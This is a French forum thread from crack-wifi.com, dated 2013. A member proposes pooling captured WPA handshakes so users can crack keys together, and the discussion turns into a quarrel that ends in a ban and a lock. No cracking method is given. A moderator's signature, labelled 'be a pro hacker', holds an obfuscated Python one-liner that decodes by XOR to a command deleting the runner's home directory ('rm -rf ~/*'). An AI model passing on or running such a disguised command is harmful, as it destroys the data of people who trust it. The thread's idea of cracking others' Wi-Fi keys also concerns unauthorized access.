Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 17-12-2013 19:15:31

FFOO31
Membre d'Or

Se regrouper pour Cracker WPA

Salut mes amis

CRACK WPA AVEC SHARING

J’ai pensé à l’option SHARING dans le domaine de la télévision, plusieurs personnes partage la même clé.

Je demande votre avis si on peut partager le fichier handshak pour plusieurs utilisateurs.

Explication

Pour éviter de créer un dictionnaire de millions mégas et aussi pour un gain du temps j’ai pensé pour celui qui a un handshak difficile à cracker, il le partage ici,  nous les utilisateurs de ce site on se regroupe pour décrypter ce fichier, dans ce cas, le fichier va être comparer avec différent dictionnaires chose optimise toutes les probabilités, à la fin  le résultat va être afficher dès qu’un utilisateur trouve la clé.

Quel sont vos avis « pour et contre » ?

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 17-12-2013 19:43:50

Furyo
Membre Irremplaçable
Site Web

Re : Se regrouper pour Cracker WPA

Juste une question, ton ami n'est toujours pas rentré de voyage car il nous serrait d'une grande aide pour ce genre de projet et tout ce qu'il a decouvert ...

Je prendrai le temps de répondre aux gens qui auront pris le temps de se présenter..
Les membres suspectés d'intentions douteuses ne trouveront que mon silence en réponse.
Morpheus à Néo : On n'est pas le meilleur quand on le croit, mais quand on le sait..
387003.jpg

#3 17-12-2013 20:38:18

FFOO31
Membre d'Or

lol toujours le meme, cette fois ci moi j'etais en voyage j'etais dans ton territoire, sois patient mon ami des que je l'aurais je te donne une parole d'homme que tu sera le premier de l'avoir

restant sur notre sujet

#4 17-12-2013 20:54:46

Furyo
Membre Irremplaçable
Site Web

FFOO31 a écrit :

lol toujours le meme, cette fois ci moi j'etais en voyage j'etais dans ton territoire, sois patient mon ami des que je l'aurais je te donne une parole d'homme que tu sera le premier de l'avoir

restant sur notre sujet

Je veux bien mais je finis par croire que ce que tu nous a raconté c'est du pipo parce que des voyages j'en ai fais, et fait... Et selon tes dires ton ami serait capable de beaucoup de choses alors je suis tres impatient de savoir et je me permet seulement de repeter (tel un extender) ce que tu t'es engagé à faire lors de ton inscription sur ce forum...

Alors peut etre que cet ami n'existe pas et je commence à croire à cela

peut-etre qu'il exist, mais tu nous donnes rien (pas de scripts, aucunes techniques, ...)

Et qui plus est, tu te permets de nous demander de l'aide quand on sait que si j'avais un ami capable de faire ce qu'il fait, je n'aurrai aucunes utilitées à venir poser des questions aussi debutantes, comme tu peux le faire...

mais je dis ca, je ne dis rien, ton ami vas surement se pointer en 2098 ou alors jamais...

Assumes et dis que c'etait des conneries plutot que t'entêter à nous convaincre que tu as la solution à tout...

Je prendrai le temps de répondre aux gens qui auront pris le temps de se présenter..
Les membres suspectés d'intentions douteuses ne trouveront que mon silence en réponse.
Morpheus à Néo : On n'est pas le meilleur quand on le croit, mais quand on le sait..
387003.jpg

#5 17-12-2013 21:05:27

FFOO31
Membre d'Or

parle de toi et ne dis pas NOUS, tu n'es pas le site t'es un utilisateur

#6 17-12-2013 21:50:39

johny12
Membre Indéboulonnable
Site Web

Admettons qu'en moyenne chaque utilisateur du site upload un HS, ça revient au même temps de calcul que tout le monde upload son HS et crack le HS de tout le monde successivement ou chacun de son côté; mais je pense que je dois louper une étape

Ou bien sinon si le but est de ne calculer qu'une fois le hash d'une clé, ça revient à "créer un dictionnaire de millions méga".

Mais de nouveau, je pense que je loupe une subtilité

Ou bien encore le but est que des bénévoles mettent leur puissance de calcul disponible ?

Fondateur de johnyhack.ddns.net, co-admin de machack.fr,  et  dirigeant du défunt mac-hack.forumactif.com

#7 17-12-2013 22:19:56

Furyo
Membre Irremplaçable
Site Web

FFOO31 a écrit :

parle de toi et ne dis pas NOUS, tu n'es pas le site t'es un utilisateur

Moi je n'ai rien avancé contrairement à toi ...

C'est TOI qui a dit les choses... Sur le forum, donc je ne suis comme tu dis un utilisateur mais un utilisateur curieux...

A ta place je n'aurrai pa ouvert ma gueule comme tu l'as fais et promis avec un soit disant ami qui sait cracké tout sans noius donner des explications ou même le moindre script...

Alors ne retourne le nous contre moi, car je suis sur que je ne suis pas le seul à attendre les soit disant competences extra-ordinaires de ton soit disant ami...

pardonnes moi, mais quand je vois les questions que tu poses(sur differents sujets), je te le re-dis, tu es un gros noob, mytho pour ma part...

mais cela ne t'empeches pas d'avouer que ton ami n'existe pas et que se exploits ne relevent que de tes reves wink

387003.jpg

#8 18-12-2013 00:47:30

kcdtv
Membre d'honneur
Lieu : Internacionaluña

et je me permet seulement de repeter (tel un extender)

WoW, Furyo a lancé l'humour "geeck wireless" tongue

#9 18-12-2013 17:54:02

Fab955
Membre Irremplaçable

Mais si Wally va bien tot passer un jour sur la terre. Il fait le tour de l univers faut juste etre patient. roll

#10 18-12-2013 22:17:01

M1ck3y
Administrateur
Lieu : Lost in the darkness

Furyo a écrit :

:et je me permet seulement de repeter (tel un extender)

J'adore 20

#11 18-12-2013 22:27:39

Furyo
Membre Irremplaçable
Site Web

M1ck3y a écrit :
Furyo a écrit :

:et je me permet seulement de repeter (tel un extender)

J'adore 20

Entre toi et kcdtv, je vais me mettre à rougir alors on se calme et on reprends ces esprits pour se concentrer sur l'essentiel...

LE FORUM !!, c'ets bien ce qui nous unit (enfin pour les membres les plus actifs et les plus interressants) wink

387003.jpg

#12 21-12-2013 20:05:43

FFOO31
Membre d'Or

furyo un peu de respect stp

#13 21-12-2013 20:15:41

Furyo
Membre Irremplaçable
Site Web

FFOO31 a écrit :

furyo un peu de respect stp

PARDON ???

Du respect, pour qui ?? toi ??

Tu te fous de nous depuis ce message et tu n'oses même pas avouer que c'est faux... ALors le respect c'est à moi qu'il faut le dire mais à toi : le gros menteur qui invente des copains capacble de faire des choses irréalisable..

Vient me parler encore de respect...

Je ne fais que repeter ce que tu as dis, ne l'oublie pas!!! Alors le respect c'est que tu ailles jusqu'au bout pauvre menteur!

387003.jpg

#14 21-12-2013 20:21:36

FFOO31
Membre d'Or

je n'ai jamais manqué de respect à qui que ce soit! alors pour la 2 fois respect toi

#15 21-12-2013 20:25:44

Furyo
Membre Irremplaçable
Site Web

FFOO31 a écrit :

je n'ai jamais manqué de respect à qui que ce soit! alors pour la 2 fois respect toi

Tu es un menteur et un mytho et je ne te manque pas de respect..

J'attends ton soit disant ami, qui n'existe pas...

Alors ne me parles pas de respect quand tu dis des betises sur le forum, TOI MEME en racontant des conneries!!!

T'es vraiment un pauvre garcon !

387003.jpg

#16 21-12-2013 20:40:30

FFOO31
Membre d'Or

j'avoue que tu m'as aider plusieurs fois, c'est pour ça je te reserve un respect , si c'etait un autre, je sais comment me defendre. le progmme je l'ai, mais il est en executable, j'attend qu'il me donne la source en bash. et tu n'auras rien et rien, tu n'es pas un patient utilisateur

#17 21-12-2013 20:50:30

Furyo
Membre Irremplaçable
Site Web

FFOO31 a écrit :

j'avoue que tu m'as aider plusieurs fois, c'est pour ça je te reserve un respect , si c'etait un autre, je sais comment me defendre. le progmme je l'ai, mais il est en executable, j'attend qu'il me donne la source en bash. et tu n'auras rien et rien, tu n'es pas un patient utilisateur

Et toi tu es un menteur, affabulateur et tu crois en ce que tu as alors que n'a s qu'un pauvre executable que personne ici ne voudras utiliser puisque nous sommes tous sous Linux...

Alors ton exe, tu te le mets au tu veux et tu fais l'avion avec  et tu arretes de nours dire des choses que ton pote est capable de faire ca ou ceci sans nous montrer une preuve tangible et realiste...

Tu peux même le garder si tu veux et te le fouttre dans le c.l si tu veux, ca m'ainterresse pas, parce que je sais que depuis le debut t'es qu'un gros mytho et vient pas me parler de respect pauvre garcon...

Retourne sous BT5 aussi tant que tu y es...

je te le redis, encore une fois, et sans te moquer de respect, T'ES UN GROS MYTHO!

T'as des couilles ??

Alors balances ta trouvaille à differents membres du forum par exemple :

administrateur, moderateurs, et autres membres actifs et j'attends leur retour sur ton soit disant programme de ton fameux ami qui n'existe que dans ton cerveau d'hirondelle...

Vas- y balances leur en MP un lien et j'attends leurs retours pour voir si c'est vrai...

Si tu le fais pas, c'est que tu prouves tout seul que t'es un menteur...

PS: NE ME l'ENVOIE PAS s'il te plait !

Dernière modification par Furyo (21-12-2013 21:06:15)

387003.jpg

#18 21-12-2013 21:58:59

spawn
Modérateur

Bon les enfants on se calme.
FF0031, je suis friand d'éxécutables, je t'invite à me l'envoyer.
Le premier qui en place une de travers je lock ce topic inutile.
La répartition des puissances de calcul ne mérite pas un topic de ce genre.

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

#19 21-12-2013 22:02:53

Furyo
Membre Irremplaçable
Site Web

spawn a écrit :

Bon les enfants on se calme.
FF0031, je suis friand d'éxécutables, je t'invite à me l'envoyer.
Le premier qui en place une de travers je lock ce topic inutile.
La répartition des puissances de calcul ne mérite pas un topic de ce genre.

Bah lock de suite, c'est edit paix et amour, qui ne sait que parler et son exe on l'attends tous...

Spawn, j'espe que toi tu le recevras et que tu saurras t'en rendre compte...

Ah au fait, l'ami, joie allégresse sur ma boite mail...

Continue, on vas rire tous les deux... yikes

Dernière modification par spawn (22-12-2013 10:51:38)

387003.jpg

#20 23-12-2013 13:42:57

FFOO31
Membre d'Or

furyo, va te faire foutre ,
t'es entrain de ridiculiser les visiteurs de ce site, t'es agressif et impoli

t'es intelligent et mal éduquer donc t'es nul pour moi.
je reste toujours fidèle à mes promesse dès que possible, je ne peux pas faire tomber le ciel pour tes beaux yeux

donc soit tu reste gentil avec les gens soit va .....

#21 23-12-2013 14:04:28

M1ck3y
Administrateur
Lieu : Lost in the darkness

FFOO31 a écrit :

furyo, va te faire foutre ,
t'es entrain de ridiculiser les visiteurs de ce site, t'es agressif et impoli

t'es intelligent et mal éduquer donc t'es nul pour moi.
je reste toujours fidèle à mes promesse dès que possible, je ne peux pas faire tomber le ciel pour tes beaux yeux

donc soit tu reste gentil avec les gens soit va .....

Pas d'insultes chez nous. Tu es banni 48H et la discussion est lockée. Si ça ne te calme pas, le prochain coup le ban sera définitif, tu peux t'estimer très chanceux.

Annonce

Pied de page des forums

Le coin des bonnes affaires, achats informatiques:

|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   

Server Stats - [ Generated in 0.03 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]